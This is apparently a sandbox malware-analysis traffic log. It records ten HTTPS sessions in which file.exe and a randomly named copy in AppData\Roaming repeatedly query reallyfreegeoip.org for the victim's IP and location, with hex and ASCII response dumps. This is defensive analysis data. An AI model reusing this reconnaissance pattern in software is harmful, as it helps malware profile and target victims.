Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49725	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:04 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:58:05 UTC	879	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97854 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6g7cdqBCPOf7h0oaT6h2GstFwguhi5n6pAc66yGuxJ0Nuj2fAzAWCbMWglLnoOQhdAK%2FSdIB4nn5Twx4yFE1lvi6R2lY%2BnV8A3CJw4tzg%2BT4w2DGq8Oi8%2F0KV7lz7z1F6cg%2BbvK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f354bfb0f4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1552&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1810291&cwnd=230&unsent_bytes=0&cid=e6d132fbce09a04f&ts=485&x=0"
2024-12-13 16:58:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49726	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:04 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:05 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97854 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j44ftbeDgbeJTCj0dE3bDvipTyNioDoOTKhwQCCddHxIMqsWbB1PATu7WJFvZ58LqofHaFOjS9hCUSW6QwSja%2Bzwhen30hmpn%2BXEPEo0saXiJRabQjTgPfy9CEym7Zb%2FUMNWgkRq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f3698dd8c59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1586956&cwnd=196&unsent_bytes=0&cid=b7f730da37db3735&ts=466&x=0"
2024-12-13 16:58:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49733	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:07 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:58:07 UTC	883	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97856 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEIDyWiht%2B8XpLsf8YzIq7IHUBSqrVlisW3C%2Fk%2F9330ojof78U575WMkVf1%2Bk0HwNwrH0kkSwO05GRHhnofXwO4bz9UJJvWbNRXuHTOND8QPKWCQbFoE6Dm%2BMZiBrh5Uqt%2B%2F8v16"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f446ce28cdd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2030&rtt_var=791&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1358139&cwnd=161&unsent_bytes=0&cid=2fa8dace4585164d&ts=461&x=0"
2024-12-13 16:58:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49739	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:09 UTC	883	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97857 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pms6qeRdg%2FsPk3BMYUU7%2Bvd9wpK1icb9r%2FD%2BX3N%2BBmgHsiZ87TlJ3h2wLtBvMel7cZBLcrIT0lvJtExNjwAscmqYPRJnK%2FxWvWgEZTW8pa1KsUDuhzo2DToGoijp7kr3VzO%2Fs5Dd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f4dbbae5e80-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1621&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=218&unsent_bytes=0&cid=c4fefb3ebaca0b64&ts=465&x=0"
2024-12-13 16:58:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49747	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:10 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:58:10 UTC	887	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97859 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WG%2F%2FrcjY%2BymH%2Bqy5xlqpS%2FAlS0O%2BGYsXN7%2Fa%2Fm7Bf3QPYTfff5pDy7hOrQyVQwnPemnnrWYjFMb4h5HbbTUR08WbtV6wWimEyKg3l0hcrOHtpJ6DnF6Mj%2BCi1J9FqkVMe1waCGA5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f58bc478c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1839&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1580942&cwnd=236&unsent_bytes=0&cid=8aae17498bfba875&ts=472&x=0"
2024-12-13 16:58:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49749	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:12 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97861 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lOIq008CVoVbTWH9b3XrffPFsummvSVeU0ERE6Nb%2BEVC83d42BIEpkyDfCkfgKma%2FHWsEpuhleMMK3PtajJc%2F3l6PWnvd9v4XDh53dAXwm3%2Fer8xH3eHpckUuY0qA0cdNmOc2Enh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f623d834356-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1558&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1822721&cwnd=235&unsent_bytes=0&cid=b7ea605ed6f05fd4&ts=458&x=0"
2024-12-13 16:58:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49758	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:13 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:14 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97862 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRUsq5sk312jc%2BBY8hJUuBrlor1EQ5XGJX%2FtIFoOB13vyzQT5zruS87xIgSvswPMH%2BmCynFpTQtlUt7WAD705EntF7PJ9nLtJ6g9PuaK1Q4JKIkwrqXK7pkTlWNmiL3%2Bb7zPCYwK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f6cfb1c8c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1841&rtt_var=729&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1586094&cwnd=201&unsent_bytes=0&cid=452875ecc4b22037&ts=486&x=0"
2024-12-13 16:58:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49765	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:15 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97864 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GlZdslvHF2X%2FHO08o6LMHKd2wF3o%2Fb08xV0Iq4g5LwQwksVtmV9KJatUrJ4JGHeuHHRGDyB%2F9eTVuATzRZgKtaE6zxmbc0csVrRRY4ooHOFfOwekn6rq0izz%2FfRA2992c10WDxsk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f765f308c4d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1814&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1584373&cwnd=158&unsent_bytes=0&cid=7c32c7f1d4121a4d&ts=456&x=0"
2024-12-13 16:58:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49773	172.67.177.134	443	6976	C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:17 UTC	879	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97866 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HezCu8HuYJFkYNeacXugZgQ7XNMali6Q2eyGttoDiVMrWBxZTfJIM9xaZAhLp%2BsN8klbRlIWam51R%2BV3hoPyXRCxcEuGclrQDCupWHcACP3U5lsQzFFH%2Fhd49q9fR73MOwPL%2F%2BPQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f82de1d7d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2015&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1395126&cwnd=242&unsent_bytes=0&cid=0385d96b7dbb0af2&ts=716&x=0"
2024-12-13 16:58:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49774	172.67.177.134	443	6176	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:58:18 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97867 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHYEGMGUl9bzuDe3zGg3sDDV89W2pJRoXoucV6Nd4z2oWboHSeXf3oDkklUw15%2BU7S9rDDfs7P5G23PG0c5ZepFRc0fjp4GFu0bkblrehpIlJg066OVEeIpwtWI1P9Lv2dUQ9ALN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f177f8a7d557cae-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1796&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1568206&cwnd=195&unsent_bytes=0&cid=a49838a645da2194&ts=458&x=0"
